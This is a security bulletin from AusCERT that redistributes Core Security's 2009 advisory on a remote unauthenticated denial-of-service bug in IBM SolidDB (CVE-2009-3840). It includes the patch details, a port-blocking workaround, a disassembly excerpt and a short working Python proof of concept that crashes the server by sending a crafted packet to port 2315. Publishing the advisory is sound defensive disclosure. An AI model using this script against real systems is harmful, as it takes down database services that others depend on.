Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2009.1547.2
IBM SolidDB invalid error code vulnerability
19 November 2009
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: IBM SolidDB Server 6.30.0.29
IBM SolidDB Server 6.30.0.33
Publisher: Core Security Technologies
Operating System: AIX
HP-UX
Red Hat
SUSE
Solaris
Windows
Impact/Access: Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2009-3840 CVE-2009-3977
Reference: ESB-2009.1546
Original Bulletin:
http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos
Revision History: November 19 2009: Added CVE reference
November 19 2009: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
IBM SolidDB invalid error code vulnerability
1. *Advisory Information*
Title: IBM SolidDB invalid error code vulnerability
Advisory Id: CORE-2009-1027
Advisory URL: http://www.coresecurity.com/content/ibm-soliddb-errorcode-dos
Date published: 2009-11-18
Date of last update: 2009-11-18
Vendors contacted: IBM
Release mode: Forced release
2. *Vulnerability Information*
Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840
3. *Vulnerability Description*
SolidDB is an in-memory relational database from IBM with over 3,000,000
deployments [1]. It is used as an embedded database by independent
software vendors of enterprise applications, telecommunications and
embedded software and systems. IBM reports SolidDB as being used in
mission-critical applications from Cisco, HP, Alcatel and Nokia Siemens.
The in-memory database is also used as core component of IBM SolidDB
Universal Cache, a performance improvement application for relational
databases such as DB2, Microsoft SQL Server, Oracle and Informix.
A remotely exploitable vulnerability was found in the database server
core component. Exploitation of this bug does not require authentication
and will lead to a remotely triggered denial of service of the database
service. It is not likely that this bug could be otherwise exploited to
compromise systems running vulnerable versions of SolidDB. Core's
security advisory CORE-2009-0814 refers to this vulnerability in HP
OpenView Network Node Manager [2]
4. *Vulnerable packages*
. IBM SolidDB Server 6.30.0.29
. IBM SolidDB Server 6.30.0.33
. Other versions may be vulnerable but were not tested by Core.
5. *Non-vulnerable packages*
. IBM SolidDB Server 6.30.0.37
6. *Vendor Information, Solutions and Workarounds*
IBM has issued the SolidDB and SolidDB Universal Cache 6.3 Fix Pack 3
which addresses this problem. It is available for download from the
vendor's Fix Central site:
http://www-01.ibm.com/support/docview.wss?rs=0&q1=solidb&uid=swg24024510
Blocking or restricting network access to port 2315/tcp will prevent
exploitation of the bug but it may have a negative impact for the
operation of any application embedding or using the SolidDB engine.
7. *Credits*
This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
IBM SolidDB server listens and accepts remote connections on port
2315/tcp. The service is implemented by 'solid.exe' which is started
automatically on boot. For certain transactions, upon receiving a packet
from the network the service will attempt to determine and display an
error code string based on an error code number specified in the packet.
By sending a specially crafted packet with an invalid error code number
it is possible to trigger an exception that forces abnormal termination
of the service. It is unlikely that the bug could be exploited for
anything other than a remote denial of service.
The following code excerpt explains the problem:
/-----
0061611F 0FB65424 02 MOVZX EDX,BYTE PTR SS:[ESP+2]
00616124 0FBF4C24 03 MOVSX ECX,WORD PTR SS:[ESP+3]
00616129 83F9 FF CMP ECX,-1
0061612C 0FBF4424 05 MOVSX EAX,WORD PTR SS:[ESP+5]
00616131 8956 10 MOV DWORD PTR DS:[ESI+10],EDX
00616134 8B5424 07 MOV EDX,DWORD PTR SS:[ESP+7]
00616138 894E 14 MOV DWORD PTR DS:[ESI+14],ECX
0061613B 8946 18 MOV DWORD PTR DS:[ESI+18],EAX
0061613E 8956 0C MOV DWORD PTR DS:[ESI+C],EDX
00616141 7D 09 JGE SHORT solid.0061614C
00616143 83F8 FF CMP EAX,-1
00616146 7D 04 JGE SHORT solid.0061614C
00616148 3BC8 CMP ECX,EAX
0061614A 74 05 JE SHORT solid.00616151
0061614C B8 01000000 MOV EAX,1
00616151 83C4 0C ADD ESP,0C
00616154 C3 RETN
- - -----/
The code above checks for an error condition based on the value of an
Error Code field in the inbound network packet. An error condition is
explicitly handled if the Error Code value is less than or equal to -1,
in which case a MessageBox with a corresponding descriptive error string
will be presented to the user. However, by crafting a packet with any
negative value in the Error Code field different from -1 the lookup for
the corresponding error string will fail triggering a non-recoverable
error and thus terminating the server process.
The following python code can be used to reproduce the bug:
/-----
#!python
import socket
import struct
#maxlen 0xA
a = struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H',0xFEFF)
a += struct.pack('<H',0xFEFF)
a += "1234"
target_ip = 'X.X.X.X'
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2315))
s.send(a)
s.close()
- - -----/
9. *Report Timeline*
. 2009-10-23:
Core Security Technologies sends an email to IBM AIX Security team
requesting a security point of contact to report security bugs in
SolidDB and asks whether the report should be sent to SolidDB security
instead.
. 2009-10-27:
IBM AIX Security replies indicating that they forwarded the request to
SolidDB's development team.
. 2009-10-27:
SolidDB's QA Manager contacts Core acknowledging the request originally
sent to AIX Security and indicating that although there isn't an
established formal channel to report security bugs in SolidDB the report
could be sent directly to him.
. 2009-10-27:
Core Security Technologies replies stating that a draft technical
document describing the problem is being prepared and will be sent to
SolidDB as soon as it is available. In the meantime, Core indicates that
a third-party vendor may have already reported the problem and requests
confirmation that said vendor recently reported a remote denial of
service vulnerability in the database service.
. 2009-11-10:
Core sends the advisory with full technical details to SolidDB team and
informs that its publication is set to December 7th, 2009, and that the
date is subject to be changed if publication of patches is coordinated
at agreed upon date between Core and IBM SolidDB. Core requests
confirmation that a SolidDB OEM customer [2] has already reported the
bug and received patches.
. 2009-11-17:
IBM SolidDB publishes patches to the vulnerable products.
. 2009-11-18:
Advisory CORE-2009-1027 published.
10. *References*
[1] IBM SolidDB
http://www-01.ibm.com/software/data/soliddb/
[2] HP Openview NNM 7.53 Invalid DB Error Code vulnerability
http://www.coresecurity.com/content/openview_nnm_internaldb_dos
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAksEO4YACgkQyNibggitWa1laACgik+qyd+ZQVgVPiERCKXVGCu/
kPgAoKAmw/r3PKYxfPb9Q2RC4Bzc8tbh
=mnrD
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/render.html?cid=1980
If you believe that your computer system has been compromised or attacked in
any way, we encourage you to let us know by completing the secure National IT
Incident Reporting Form at:
http://www.auscert.org.au/render.html?it=3192
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iD8DBQFLBM0KNVH5XJJInbgRAlHtAJwNuKSUABi+Rd1y/b9eAhu49ONVJQCghrNn
GwRcFwyZSaKvgQOYhoL7GXM=
=kwNa
-----END PGP SIGNATURE-----